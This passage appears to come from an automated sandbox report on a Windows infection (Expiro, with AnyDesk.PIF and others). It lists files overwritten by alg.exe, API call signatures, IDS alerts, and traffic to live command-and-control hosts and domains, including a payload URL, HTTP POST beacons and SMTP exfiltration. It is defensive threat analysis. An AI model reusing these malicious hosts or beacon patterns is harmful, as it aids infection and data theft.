                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7D1537B4C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D152823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF7D152823C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1522978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF7D1522978
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1511560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF7D1511560
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15135B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF7D15135B8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1537B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF7D1537B4C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F138D440
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF7F13CD4A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF7F13CB3D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1403674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF7F1403674
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1421B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF7F1421B04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14219F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF7F14219F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF7F13CDBC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF7F13C5E58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF7F142234C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF7F13BC6F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1423100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F1423100
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF7F14210C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1426F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF7F1426F80
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02EA5908
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49914 -> 54.244.188.177:80
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:60092 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:59465 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:50248 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:50501 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:50028 -> 82.112.184.197:80
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:54567 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:54507 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.7:61118 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:50132 -> 72.52.178.23:80
                    Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.7:53758 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.7:59218 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:60112 -> 172.234.222.143:80
                    Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.7:55773 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.7:52819 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.7:55589 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.7:58751 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:51980 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.7:50242 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:62510 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.7:65464 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:53926 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.7:53053 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:57165 -> 1.1.1.1:53
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                    Queries random domain names (often used to prevent blacklisting and sinkholes)
                    Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                    Source: unknownNetwork traffic detected: DNS query count 131
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBE4B8 InternetCheckConnectionA,15_2_02EBE4B8
                    Source: global trafficTCP traffic: 192.168.2.7:49922 -> 51.195.88.199:587
                    Source: global trafficDNS traffic detected: number of DNS queries: 131
                    Source: Joe Sandbox ViewIP Address: 3.254.94.185 3.254.94.185
                    Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 198.252.105.91:443
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49888
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49888
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49906
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49906
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49883
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49883
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:50011
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.7:50026
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.7:50026
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.7:50054
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.7:50054
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:50013
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:50011
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.7:50018
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.7:50018
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.7:50043
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.7:50043
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.7:50025
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.7:50025
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.7:50091
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.7:50091
                    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.7:50124
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.7:50124
                    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:50013
                    Source: global trafficTCP traffic: 192.168.2.7:49922 -> 51.195.88.199:587
                    Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bkk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /nyt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /eoqitiy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /iwtyrexju HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /jevf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ybu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /bya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /nchhums HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /chqlbpn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lwhipkemtkmayb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /nu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /obevglctnlfkacjm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /ikqsakdpetf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /hwverablwtpyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 844
                    Source: global trafficHTTP traffic detected: POST /uspwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
